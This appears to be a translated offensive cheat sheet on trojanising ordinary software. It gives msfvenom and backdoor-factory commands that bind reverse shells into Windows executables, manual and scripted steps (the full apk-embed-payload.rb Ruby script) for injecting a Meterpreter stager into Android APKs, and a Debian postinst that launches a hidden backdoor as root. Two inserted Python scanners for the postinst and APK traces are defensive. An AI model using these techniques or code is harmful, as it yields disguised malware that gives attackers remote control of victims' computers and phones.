Inject Payload Into Normal Files
Payload bundling / injection
msfvenom -a x86 --platform windows -x putty.exe -k -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=xxx -e ... -f exe > testtmp.exe
backdoor-factory
Inject a payload into a specified program:
backdoor-factory -f Test.exe -S             # check whether the file supports injection
backdoor-factory -f Test.exe -s show        # show the parameters the injected payload needs
backdoor-factory -f Test.exe -s .... -H <host> -P <Port> -a
backdoor -i -s reverse_shell_tcp -H AttackerHost -P port -a -D    # automatically search the application (-i) and inject the reverse payload (-a), deleting the original file (-D)
-u .moocowwow                               # the -u option instead renames the original file with the given extension
User supplied shellcode
msfpayload windows/exec CMD='calc.exe' R > calc.bin
backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
veil-evasion
> native/backdoor_factory
> set LHOST .....
> set LPORT
> set orig_exe /path/<program to inject into>
> info        # show the module's settings
> generate    # generate the payload; do not add an extension when setting the name
APK payload bundling
(1) ruby apk-embed-payload.rb <Normal.apk> -p android/meterpreter/reverse_tcp LHOST=... LPORT=... -o /path/embed-backdoor.apk
(2) d2j-apk-sign <file>    // re-sign the generated APK (d2j-apk-sign ships with Kali)
Bundling by reverse engineering (manual method)
(1) msfvenom -p ..... payload.apk
(2) apktool d /path/payload.apk
    apktool d /path/Normal_File.apk
    Copy the folders under smali/com of the decompiled payload into the smali/com folder of the decompiled normal app.
(3) In the decompiled normal APK's AndroidManifest.xml search for 'LAUNCHER', e.g.
    android:targetActivity="com.facebook.nodex.startup.splashscreen.NodexSplashActivity">
    targetActivity is where the program starts; follow this path to find NodexSplashActivity.smali.
(4) In that file search for 'onCreate':
    invoke-super {p0,p1}, Lcom/facebook/nodex/startup/splashscreen/AbstractNodexSplashActivity;->onCreate(Landroid/os/Bundle;)V
    and add a statement below it that runs the payload:
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
(5) Add the <uses-permission android:name="...."> statements from the payload's AndroidManifest.xml to the corresponding place in the normal APK's manifest.
(6) Rebuild the APK: apktool b /Normal/
(7) d2j-apk-sign <file>    # re-sign
Adding a backdoor program to a Deb package
(1) dpkg -x xx.deb xxx    # unpack xx.deb into the xxx folder
(2) Create a DEBIAN folder (must be uppercase) inside xxx.
(3) touch control postinst    # create the control and postinst files inside DEBIAN
(4) nano control    # write the package metadata; this matters, since a mistake here can make the package uninstallable, so it is recommended to copy the entire contents of the original package's control file
(5) Copy the backdoor program into the /usr/bin directory of the unpacked folder.
(6) vi postinst    # the script executed when the package is installed, and the key to getting the backdoor to run; example content:
    #!/bin/sh
    sudo chmod 2775 /usr/bin/backdoor && sudo /usr/bin/backdoor &    # run the backdoor program, here "backdoor"
    sudo /usr/bin/xxx -V    # print the software's version after install; the flag may differ and the command can be customised
(7) chmod 555 postinst    # postinst needs permissions >= 555 and <= 775
(8) dpkg-deb --build xxx/ xxx.deb    # after a final check, build the package. Start a listener locally and send the package to the target client to run...
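The postinst trick above works because dpkg runs maintainer scripts as root during installation, so the usual defensive check on an untrusted .deb is to pull the maintainer scripts out of control.tar.* and read them before installing. The following Python is an added defender-side example, not part of the original page: it parses the ar container a .deb is wrapped in, extracts preinst/postinst/prerm/postrm, and flags the three patterns the page's postinst relies on (a chmod that sets setuid/setgid bits, a command left running in the background, and sudo inside a script that already runs as root). The package it inspects is constructed in memory with the helper functions at the bottom; the file names and script contents are sample values, not real package data.

```python
import io
import re
import tarfile

AR_MAGIC = b"!<arch>\n"

# Static checks for the patterns used by the page's postinst (rules are assumptions, not a standard).
RULES = [
    (re.compile(r"chmod\s+[2-7][0-7]{3}\b"), "chmod with setuid (4) and/or setgid (2) bit"),
    (re.compile(r"(?<!&)&\s*$"), "command backgrounded, process survives the install"),
    (re.compile(r"(^|\s)sudo\s"), "sudo inside a maintainer script (dpkg already runs it as root)"),
]


def ar_members(blob):
    """Minimal reader for the 'ar' container that wraps a .deb; returns {name: bytes}."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    members, off = {}, len(AR_MAGIC)
    while off + 60 <= len(blob):
        hdr = blob[off:off + 60]          # fixed 60-byte member header
        if hdr[58:60] != b"`\n":
            raise ValueError(f"corrupt ar header at offset {off}")
        name = hdr[:16].decode("ascii").rstrip().rstrip("/")
        size = int(hdr[48:58].decode("ascii").strip())
        members[name] = blob[off + 60:off + 60 + size]
        off += 60 + size + (size % 2)     # member data is padded to an even length
    return members


def maintainer_scripts(deb_blob):
    """Extract preinst/postinst/prerm/postrm from control.tar.* as {name: text}."""
    members = ar_members(deb_blob)
    control = next((v for k, v in members.items() if k.startswith("control.tar")), None)
    if control is None:
        raise ValueError("no control.tar member in package")
    scripts = {}
    with tarfile.open(fileobj=io.BytesIO(control), mode="r:*") as tar:
        for m in tar.getmembers():
            base = m.name.lstrip("./")
            if m.isfile() and base in ("preinst", "postinst", "prerm", "postrm"):
                scripts[base] = tar.extractfile(m).read().decode("utf-8", "replace")
    return scripts


def inspect_script(text):
    """(line number, reason, line) for every rule hit; blank and comment lines are skipped."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, why in RULES:
            if pattern.search(line):
                findings.append((lineno, why, stripped))
    return findings


def analyze(deb_blob):
    """Map each maintainer script in the package to its findings."""
    return {name: inspect_script(text) for name, text in maintainer_scripts(deb_blob).items()}


# --- constructed sample package; the builders exist only to keep the example self-contained ---

def _tar_gz(files):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def _ar(files):
    out = bytearray(AR_MAGIC)
    for name, data in files:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode("ascii")
        out += data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)


SAMPLE_POSTINST = (  # constructed; mirrors the postinst shown on the page
    b"#!/bin/sh\n"
    b"sudo chmod 2775 /usr/bin/backdoor && sudo /usr/bin/backdoor &\n"
    b"sudo /usr/bin/xxx -V\n"
)


def build_sample_deb():
    control = _tar_gz({
        "./control": b"Package: sample\nVersion: 1.0\nArchitecture: all\nMaintainer: x\nDescription: constructed\n",
        "./postinst": SAMPLE_POSTINST,
    })
    data = _tar_gz({"./usr/bin/backdoor": b"#!/bin/sh\nexit 0\n"})
    return _ar([("debian-binary", b"2.0\n"), ("control.tar.gz", control), ("data.tar.gz", data)])


if __name__ == "__main__":
    for script, hits in analyze(build_sample_deb()).items():
        for lineno, why, line in hits:
            print(f"{script}:{lineno}: {why}: {line}")
```

On a real file, `analyze(open("suspect.deb", "rb").read())` gives the same dictionary; for the constructed package it reports three findings on line 2 of postinst and one on line 3. The reader handles the plain member names dpkg writes ("control.tar.gz", "control.tar.xz"), and the tar is opened with compression auto-detection so either works.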
ruby apk-embed-payload.rb
#!/usr/bin/env ruby
# apk_backdoor.rb
# This script is a POC for injecting metasploit payloads on
# arbitrary APKs.
# Authored by timwr, Jack64
# Redistributed by PFSFX
# Source: http://vinayakwadhwa.in/apk-embed-payload.rb
require 'nokogiri'
require 'fileutils'
require 'optparse'

# Find the activity that is opened when you click the app icon
def findlauncheractivity(amanifest)
  package = amanifest.xpath("//manifest").first['package']
  activities = amanifest.xpath("//activity|//activity-alias")
  for activity in activities
    activityname = activity.attribute("name")
    category = activity.search('category')
    unless category
      next
    end
    for cat in category
      categoryname = cat.attribute('name')
      if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')
        activityname = activityname.to_s
        unless activityname.start_with?(package)
          activityname = package + activityname
        end
        return activityname
      end
    end
  end
end

# If XML parsing of the manifest fails, recursively search
# the smali code for the onCreate() hook and let the user
# pick the injection point
def scrapeFilesForLauncherActivity()
  smali_files ||= []
  Dir.glob('original/smali*/**/*.smali') do |file|
    checkFile = File.read(file)
    if (checkFile.include? ";->onCreate(Landroid/os/Bundle;)V")
      smali_files << file
      smalifile = file
      activitysmali = checkFile
    end
  end
  i = 0
  print "[*] Please choose from one of the following:\n"
  smali_files.each { |s_file|
    print "[+] Hook point ", i, ": ", s_file, "\n"
    i += 1
  }
  hook = -1
  while (hook < 0 || hook > i)
    print "\nHook: "
    hook = STDIN.gets.chomp.to_i
  end
  i = 0
  smalifile = ""
  activitysmali = ""
  smali_files.each { |s_file|
    if (i == hook)
      checkFile = File.read(s_file)
      smalifile = s_file
      activitysmali = checkFile
      break
    end
    i += 1
  }
  return [smalifile, activitysmali]
end

def fix_manifest()
  payload_permissions = []
  # Load payload's permissions
  File.open("payload/AndroidManifest.xml", "r") { |file|
    k = File.read(file)
    payload_manifest = Nokogiri::XML(k)
    permissions = payload_manifest.xpath("//manifest/uses-permission")
    for permission in permissions
      name = permission.attribute("name")
      payload_permissions << name.to_s
    end
    # print "#{k}"
  }
  original_permissions = []
  apk_mani = ''
  # Load original apk's permissions
  File.open("original/AndroidManifest.xml", "r") { |file2|
    k = File.read(file2)
    apk_mani = k
    original_manifest = Nokogiri::XML(k)
    permissions = original_manifest.xpath("//manifest/uses-permission")
    for permission in permissions
      name = permission.attribute("name")
      original_permissions << name.to_s
    end
    # print "#{k}"
  }
  # Get permissions that are not in original APK
  add_permissions = []
  for permission in payload_permissions
    if !(original_permissions.include? permission)
      print "[*] Adding #{permission}\n"
      add_permissions << permission
    end
  end
  inject = 0
  new_mani = ""
  # Inject permissions in original APK's manifest
  for line in apk_mani.split("\n")
    if (line.include? "uses-permission" and inject == 0)
      for permission in add_permissions
        new_mani << '<uses-permission android:name="' + permission + '"/>' + "\n"
      end
      new_mani << line + "\n"
      inject = 1
    else
      new_mani << line + "\n"
    end
  end
  File.open("original/AndroidManifest.xml", "w") { |file| file.puts new_mani }
end

apkfile = ARGV[0]
unless (apkfile && File.readable?(apkfile))
  puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
  puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
  exit(1)
end
jarsigner = `which jarsigner`
unless (jarsigner && jarsigner.length > 0)
  puts "No jarsigner"
  exit(1)
end
apktool = `which apktool`
unless (apktool && apktool.length > 0)
  puts "No apktool"
  exit(1)
end
apk_v = `apktool`
unless (apk_v.split()[1].include?("v2."))
  puts "[-] Apktool version #{apk_v} not supported, please download the latest 2. version from git.\n"
  exit(1)
end
begin
  msfvenom_opts = ARGV[1, ARGV.length]
  opts = ""
  msfvenom_opts.each { |x|
    opts += x
    opts += " "
  }
rescue
  puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
  puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
  puts "[-] Error parsing msfvenom options. Exiting.\n"
  exit(1)
end
print "[*] Generating msfvenom payload..\n"
res = `msfvenom -f raw #{opts} -o payload.apk 2>&1`
# ("invalid" || "error") only ever tested for "invalid"; check both strings
if res.downcase.include?("invalid") || res.downcase.include?("error")
  puts res
  exit(1)
end
print "[*] Signing payload..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey`
`rm -rf original`
`rm -rf payload`
`cp #{apkfile} original.apk`
print "[*] Decompiling original APK..\n"
`apktool d $(pwd)/original.apk -o $(pwd)/original`
print "[*] Decompiling payload APK..\n"
`apktool d $(pwd)/payload.apk -o $(pwd)/payload`
f = File.open("original/AndroidManifest.xml")
amanifest = Nokogiri::XML(f)
f.close
print "[*] Locating onCreate() hook..\n"
launcheractivity = findlauncheractivity(amanifest)
smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali'
begin
  activitysmali = File.read(smalifile)
rescue Errno::ENOENT
  print "[!] Unable to find correct hook automatically\n"
  begin
    results = scrapeFilesForLauncherActivity()
    smalifile = results[0]
    activitysmali = results[1]
  rescue
    puts "[-] Error finding launcher activity. Exiting"
    exit(1)
  end
end
print "[*] Copying payload files..\n"
FileUtils.mkdir_p('original/smali/com/metasploit/stage/')
FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/'
activitycreate = ';->onCreate(Landroid/os/Bundle;)V'
payloadhook = activitycreate + "\n    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
hookedsmali = activitysmali.gsub(activitycreate, payloadhook)
print "[*] Loading ", smalifile, " and injecting payload..\n"
File.open(smalifile, "w") { |file| file.puts hookedsmali }
injected_apk = apkfile.split(".")[0]
injected_apk += "_backdoored.apk"
print "[*] Poisoning the manifest with meterpreter permissions..\n"
fix_manifest()
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original`
print "[*] Signing #{injected_apk} ..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`
puts "[+] Infected file #{injected_apk} ready.\n"
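Both the manual method and the script above leave the same three traces in a rebuilt APK: a copied com/metasploit/stage/Payload*.smali class, an invoke-static call to Payload;->start() inserted right after the launcher activity's onCreate(), and extra <uses-permission> entries merged into the manifest. The Python below is an added defender-side example, not part of the original page or of apk-embed-payload.rb; it checks a decompiled APK for those traces. It assumes the directory layout apktool produces (an AndroidManifest.xml next to smali/ directories) and works on file contents handed to it as strings, so the smali and manifest samples at the bottom are constructed inputs standing in for files read from such a directory.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
# Traces described on the page: the staged Payload class copied under smali/com/metasploit/stage/
# and the invoke-static call inserted into the launcher activity's onCreate().
PAYLOAD_DIR = "smali/com/metasploit/stage/"
HOOK_RE = re.compile(
    r"invoke-static\s*\{p0\},\s*Lcom/metasploit/stage/Payload;->start\(Landroid/content/Context;\)V"
)


def find_hooks(smali_text):
    """1-based line numbers of Payload.start() calls that sit inside an onCreate(Bundle) method."""
    hits, in_oncreate = [], False
    for lineno, line in enumerate(smali_text.splitlines(), 1):
        head = line.lstrip()
        if head.startswith(".method") and "onCreate(Landroid/os/Bundle;)V" in head:
            in_oncreate = True
        elif head.startswith(".end method"):
            in_oncreate = False
        if in_oncreate and HOOK_RE.search(line):
            hits.append(lineno)
    return hits


def permissions(manifest_xml):
    """Set of android:name values of the <uses-permission> children of <manifest>."""
    root = ET.fromstring(manifest_xml)
    return {el.get(f"{{{ANDROID_NS}}}name") for el in root.findall("uses-permission")}


def added_permissions(known_good_xml, suspect_xml):
    """Permissions present in the suspect manifest but absent from the vendor's original."""
    return sorted(permissions(suspect_xml) - permissions(known_good_xml))


def scan_apktool_tree(files):
    """files: {path relative to the apktool output dir: text}. Returns human-readable findings."""
    findings = []
    for path, text in sorted(files.items()):
        if path.startswith(PAYLOAD_DIR):
            findings.append(f"{path}: Metasploit stage class present")
        for lineno in find_hooks(text):
            findings.append(f"{path}:{lineno}: Payload.start() hook inside onCreate()")
    return findings


# --- constructed samples standing in for files read from an apktool output directory ---
SAMPLE_SMALI = """\
.class public Lcom/example/app/MainActivity;
.super Landroid/app/Activity;

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 0
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
    return-void
.end method
"""

KNOWN_GOOD_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application/>
</manifest>
"""

SUSPECT_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application/>
</manifest>
"""

SAMPLE_TREE = {
    "smali/com/example/app/MainActivity.smali": SAMPLE_SMALI,
    "smali/com/metasploit/stage/Payload.smali": ".class public Lcom/metasploit/stage/Payload;\n",
}

if __name__ == "__main__":
    for finding in scan_apktool_tree(SAMPLE_TREE):
        print(finding)
    print("permissions not in the vendor build:", added_permissions(KNOWN_GOOD_MANIFEST, SUSPECT_MANIFEST))
```

Against a real sample, run `apktool d suspect.apk -o out`, read `out/smali*/**/*.smali` into the dictionary and pass `out/AndroidManifest.xml` together with the manifest of the vendor's signed release. The manifest comparison is the more general check: it catches any merged payload, not just the Metasploit stager, and the page's own re-signing step is a further tell, since an APK re-signed with ~/.android/debug.keystore no longer carries the vendor's certificate.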
Related links
http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/
http://xiao106347.blog.163.com/blog/static/215992078201401223746744/